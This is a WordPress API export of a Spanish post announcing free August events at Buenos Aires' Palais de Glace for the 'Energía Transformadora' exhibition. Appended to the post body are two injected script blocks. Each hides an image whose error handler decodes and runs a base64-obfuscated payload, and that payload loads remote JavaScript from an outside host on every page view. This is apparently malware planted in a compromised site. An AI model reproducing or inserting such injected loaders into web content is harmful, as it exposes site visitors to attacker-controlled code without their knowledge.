{"id":2980,"date":"2023-08-11T10:09:15","date_gmt":"2023-08-11T13:09:15","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2980"},"modified":"2025-08-14T00:10:39","modified_gmt":"2025-08-14T03:10:39","slug":"agosto-en-el-palais-de-glace","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2980","title":{"rendered":"Agosto en el Palais de Glace"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#b10631\"><em>Como parte de la muestra \u201cEnerg\u00eda Transformadora\u201d, el p\u00fablico podr\u00e1 disfrutar de exhibiciones, visitas guiadas, performances y proyecciones durante todo el mes.<\/em><\/h4>\n\n\n\n<p>El&nbsp;<a href=\"https:\/\/palaisdeglace.cultura.gob.ar\/\" target=\"_blank\" rel=\"noreferrer noopener\">Palacio Nacional de las Artes-Palais de Glace<\/a>&nbsp;(Viamonte 525, ciudad de Buenos Aires) ofrece, durante el mes de agosto, una serie de actividades gratuitas complementarias a la exhibici\u00f3n&nbsp;<strong><em>Energ\u00eda Transformadora<\/em><\/strong>, organizada junto al&nbsp;<a href=\"https:\/\/www.argentina.gob.ar\/cultura\/desarrollo\/matria\" target=\"_blank\" rel=\"noreferrer noopener\">Mercado de Artesan\u00edas Tradicionales e Innovadoras Argentinas (MATRIA)<\/a>, que re\u00fane artesan\u00edas y otras expresiones art\u00edsticas de distintas regiones de la Argentina.<\/p>\n\n\n\n<p><strong>Jueves de agosto a las 11 y 13.30 h<\/strong><br><strong>Visita guiada por la muestra&nbsp;<em>Energ\u00eda Transformadora<\/em>, destinada a escuelas y otras instituciones educativas.<\/strong><br>Un recorrido por la exhibici\u00f3n&nbsp;<em>Energ\u00eda transformadora: Transitar las fronteras entre artesan\u00eda, g\u00e9nero y territorio<\/em>. Inscripci\u00f3n y consultas:&nbsp;<a href=\"mailto:educacionpalaisdeglace@gmail.com\" target=\"_blank\" rel=\"noopener\" title=\"\">educacionpalaisdeglace@gmail.com<\/a>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/dsc01151.jpg\" alt=\"\"\/><\/figure>\n\n\n\n<p><strong>Viernes 11 y 18 de agosto de 18 a 19 h<\/strong><br>Recorrido guiado por la exhibici\u00f3n temporaria&nbsp;<em>Energ\u00eda Transformadora<\/em>.<br>Un recorrido por la exhibici\u00f3n a cargo de Emmanuel Franco, uno de sus curadores. En esta visita, se propone establecer un di\u00e1logo sobre los t\u00f3picos y las piezas que integran el proyecto, revisitando la materialidad de las piezas y sus modos de hacer en la cosmovisi\u00f3n de los pueblos ind\u00edgenas, cuya pr\u00e1ctica artesanal valora desde tiempos ancestrales el vivir la vida en plenitud, en armon\u00eda y equilibrio con los ciclos de la madre tierra.<br>El&nbsp;<strong>viernes 18\/8<\/strong>&nbsp;se transmitir\u00e1 en vivo por&nbsp;<a href=\"https:\/\/www.instagram.com\/palaisdeglacear\/\" target=\"_blank\" rel=\"noreferrer noopener\">Instagram<\/a><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/dsc01163.jpg\" alt=\"\"\/><\/figure>\n\n\n\n<p><strong>Viernes 11 de agosto de 19 a 20 h<\/strong><br><strong>50 corbatas: performance, en el marco de la exposici\u00f3n&nbsp;<em>Energ\u00eda Transformadora<\/em>, a cargo de Armando Bruno.<br>El artista **Armando Bruno<\/strong>&nbsp;invita a ser parte de una gran reflexi\u00f3n sobre las diversas construcciones de la masculinidad. A partir del uso de 50 corbatas, su cuerpo se transforma en otra entidad, en un ser que discurre en un devenir trans.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/19_-_50_corbatas.jpg\" alt=\"\"\/><\/figure>\n\n\n\n<p><strong>Domingo 27 de agosto a las 17 y 18 h<\/strong><br><strong>Conversaci\u00f3n con la artista: 18.30 h<\/strong><br>Proyecci\u00f3n de pieza audiovisual \u201cL&#8217;Arte e la Vanit\u00e1\u201d de Laura Codega, en el marco de la muestra&nbsp;<em>Energ\u00eda Transformadora<\/em>.<br>Una proyecci\u00f3n de la pieza audiovisual&nbsp;<em>L&#8217;Arte e la Vanit\u00e1<\/em>&nbsp;de la artista&nbsp;<strong>Laura Codega<\/strong>, integrante de la exhibici\u00f3n&nbsp;<em>Energ\u00eda transformadora<\/em>. A partir de una f\u00e1bula misteriosa donde intervienen diferentes elementos de las artes visuales, se propone una reflexi\u00f3n sobre el arte, la artesan\u00eda y los diferentes elementos que componen la vida de un artista. Al finalizar la proyecci\u00f3n, conversaremos con la artista sobre la pieza y sus obras.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/larte_e_la_vanita.jpg\" alt=\"\"\/><\/figure>\n\n\n\n<p>Sinopsis de la pieza:<br>En albores del siglo XXI, una antigua hechicera llamada Arte, pasa sus d\u00edas mendigando junto a su hija Artesan\u00eda. Deambulando por la Encrucijada de la Forma Rota, Arte conoce a Vanidad, y deslumbrada por sus maneras, vestidos y lenguaje, se enamora de ella. Pero los impulsos elementales de Vanidad son la posesi\u00f3n y el poder y en su deseo de tener lo que no se tiene, reclama para s\u00ed misma los recursos de la vieja bruja.<\/p>\n\n\n\n<p>Actividad gratuita, sin inscripci\u00f3n previa, orientada al p\u00fablico general.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/www.argentina.gob.ar\/noticias\/agosto-en-el-palais-de-glace\" target=\"_blank\" rel=\"noreferrer noopener\"><img fetchpriority=\"high\" decoding=\"async\" width=\"746\" height=\"102\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/08\/Captura-web_11-8-2023_94912_www.argentina.gob_.ar_.jpeg\" alt=\"\" class=\"wp-image-2981\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/08\/Captura-web_11-8-2023_94912_www.argentina.gob_.ar_.jpeg 746w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/08\/Captura-web_11-8-2023_94912_www.argentina.gob_.ar_-300x41.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/08\/Captura-web_11-8-2023_94912_www.argentina.gob_.ar_-696x95.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/08\/Captura-web_11-8-2023_94912_www.argentina.gob_.ar_-741x102.jpeg 741w\" sizes=\"(max-width: 746px) 100vw, 746px\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Como parte de la muestra \u201cEnerg\u00eda Transformadora\u201d, el p\u00fablico podr\u00e1 disfrutar de exhibiciones, visitas guiadas, performances y proyecciones durante todo el mes. El&nbsp;Palacio Nacional de las Artes-Palais de Glace&nbsp;(Viamonte 525, ciudad de Buenos Aires) ofrece, durante el mes de agosto, una serie de actividades gratuitas complementarias a la exhibici\u00f3n&nbsp;Energ\u00eda Transformadora, organizada junto al&nbsp;Mercado de Artesan\u00edas [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2983,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,9,21],"tags":[],"class_list":{"0":"post-2980","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-museos","9":"category-nacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2980"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2980"}],"version-history":[{"count":4,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2980\/revisions"}],"predecessor-version":[{"id":6995,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2980\/revisions\/6995"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2983"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2980"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2980"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2980"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}